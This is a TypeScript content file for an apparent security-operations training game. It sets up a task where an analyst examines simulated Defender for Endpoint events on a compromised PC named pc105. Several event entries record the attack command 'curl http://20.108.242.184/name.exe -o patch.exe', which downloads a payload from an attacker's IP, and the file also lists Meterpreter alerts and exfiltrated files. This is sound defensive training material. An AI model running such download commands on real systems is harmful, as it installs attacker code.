import type { LocaleContent, CardOrEntryLocaleContent } from "../../types";

/**
 * i18Next `entries:Episode01.Task06` lead text content
 */
const Task06Lead: LocaleContent = {
  header: "Investigate Amari's PC in Defender for Endpoint",
  role: "Security Operations Analyst",
  time: "5m",
  brief: "We need to find out more about how this attack took place. Check Amari's device for evidence of the curl command being run on it, or any other information that provides more detail on the attack. Are there any other suspicious files?<br><br>-Andrea",
};

/**
 * i18Next `entries:Episode01.Task06` entry content
 */
const Task06Entries: CardOrEntryLocaleContent = {
  DeviceNetworkEvent1: {
    heading: "Device Network Event 1",
    default: "Device Network Event with suspicious IP address",
    DNE1DeviceName: "Device Name: pc105",
    DNE1_User: "User: amari.rivera",
    DNE1_Table: "Table: DeviceNetworkEvents",
    DNE1_Time: "Timestamp: Oct 29, 2021 11:12:53 PM",
    DNE1_RemoteIP: "Remote IP: 20.108.242.184",
    DNE1_ActionType: "Action Type: ConnectionSuccess",
    DNE1_Process: "Initiating Process File Name: patch.exe",
    DNE1_FolderPath: "Initiating Process Folder Path: c:\\patch\\patch.exe",
    DNE1_RemotePort: "Remote Port: 443",
  },
  DeviceNetworkEvent2: {
    heading: "Device Network Event 2",
    default: "Device Network Event with suspicious IP address",
    DNE2_DeviceName: "Device Name: pc105",
    DNE2_User: "User: amari.rivera",
    DNE2_Table: "Table: DeviceNetworkEvents",
    DNE2_Time: "Timestamp: Oct 29, 2021 11:12:53 PM",
    DNE2_RemoteIP: "Remote IP: 20.108.242.184",
    DNE2_ActionType: "Action Type: ConnectionSuccess",
    DNE2_Process: "Initiating Process File Name: patch.exe",
    DNE2_FolderPath: "Initiating Process Folder Path: c:\\patch\\patch.exe",
    DNE2_RemotePort: "Remote Port: 443",
  },
  DeviceEvents1: {
    heading: "Device Event 1",
    default: "Device Events with suspicious IP address",
    DE1_DeviceName: "Device Name: pc105",
    DE1_User: "User: amari.rivera",
    DE1_Table: "Table: DeviceEvents",
    DE1_Time: "Timestamp: Oct 29, 2021 11:05:34 PM",
    DE1_FileName: "File Name: curl.exe",
    DE1_ProcessCommandLine: "Process Command Line: curl http://20.108.242.184/name.exe -o patch.exe",
    DE1_ProcessCreationTime: "Process Creation Time: Oct 29, 2021 11:04:35 PM",
  },
  DeviceEvents2: {
    heading: "Device Event 2",
    default: "Device Events with suspicious IP address",
    DE2_DeviceName: "Device Name: pc105",
    DE2_User: "User: amari.rivera",
    DE2_Table: "Table: DeviceEvents",
    DE2_Time: "Timestamp: Oct 29, 2021 11:09:18 PM",
    DE2_FileName: "File Name: patch.exe",
    DE2_InitiatingProcessCommandLine: "Initiating Process Command Line: curl http://20.108.242.184/name.exe -o patch.exe",
    DE2_InitiatingProcessCreationTime: "Initiating Process Creation Time: Oct 29, 2021 11:09:18 PM",
  },
  DeviceEvents3: {
    heading: "Device Event 3",
    default: "Device Events with suspicious IP address",
    DE3_DeviceName: "Device Name: pc105",
    DE3_User: "User: amari.rivera",
    DE3_Table: "Table: DeviceEvents",
    DE3_Time: "Timestamp: Oct 29, 2021 11:12:42 PM",
    DE3_FileName: "File Name: curl.exe",
    DE3_ProcessCommandLine: "Process Command Line: curl http://20.108.242.184/name.exe -o patch.exe",
  },
  DeviceFileEvents1: {
    heading: "Device File Events 1",
    default: "Device File Events with suspicious IP address",
    DFE1_DeviceName: "Device Name: pc105",
    DFE1_User: "User: amari.rivera",
    DFE1_Table: "Table: DeviceFileEvents",
    DFE1_Time: "Timestamp: Oct 29, 2021 11:09:18 PM",
    DFE1_FileName: "File Name: patch.exe",
    DFE1_FolderPath: "Folder Path: c:\\patch\\patch.exe",
    DFE1_ActionType: "Action Type: FileCreated",
    DFE1_InitiatingProcessFileName: "Initiating Process File Name: curl.exe",
    DFE1_InitiatingProcessCommandLine: "Initiating Process Command Line: curl http://20.108.242.184/name.exe -o patch.exe",
  },
  pc105InventoryStatus: {
    heading: "pc105 Inventory Status",
    default: "Active Alerts for pc105",
    pc105RiskLevel: "Risk Level: Medium",
    pc105Alerts: "Alerts: 2 active alerts in 1 incident",
    pc105Alert1Title: "Alert 1 Title: Reflective dll loading detected",
    pc105Alert1Severity: "Alert 1 Severity: Medium",
    pc105Alert1Status: "Alert 1 Status: New",
    pc105Alert2Title: "Alert 2 Title: A malicious PowerShell Cmdlet was invoked on the machine",
    pc105Alert2Severity: "Alert 2 Severity: Medium",
    pc105Alert2Status: "Alert 2 Status: New",
    pc105Alert3Title: "Alert 3 Title: Meterpreter post-exploitation tool",
    pc105Alert3Severity: "Alert 3 Severity: Medium",
    pc105Alert3Status: "Alert 3 Status: Resolved",
  },
  pc105LiveResponse: {
    heading: "pc105 Live Response",
    deafult: "Information from Live Response of pc105",
    pc105LRFileName: "Malicious File Name: c:\\patch\\patch.exe",
    pc105LRFolder: "Suspicious Folder: c:\\patch\\Shopping List",
    pc105LRZipFile: "Suspicious File: c:\\patch\\ShoppingList.zip",
    pc105ExfiltratedFile1: "Exfiltrated File: BFYO Purchasing Data - Q1.xlsx",
    pc105ExfiltratedFile2: "Exfiltrated File: Contoso Resrouce and Development Spend Analysis.xlsx",
    pc105ExfiltratedFile3: "Exfiltrated File: InventoryList.xlsx",
    pc105ExfiltratedFile4: "Exfiltrated File: Mark 8 Parts and Specs List.xlsx",
    pc105ExfiltratedFile5: "Exfiltrated File: P and L Summary.xlsx",
    pc105ExfiltratedFile6: "Exfiltrated File: Sales Results Overview.xlsx",
    pc105ExfiltratedFile7: "Exfiltrated File: UI UX Guidelines.docx",
  },
};

export default {
  ...Task06Lead,
  ...Task06Entries,
};
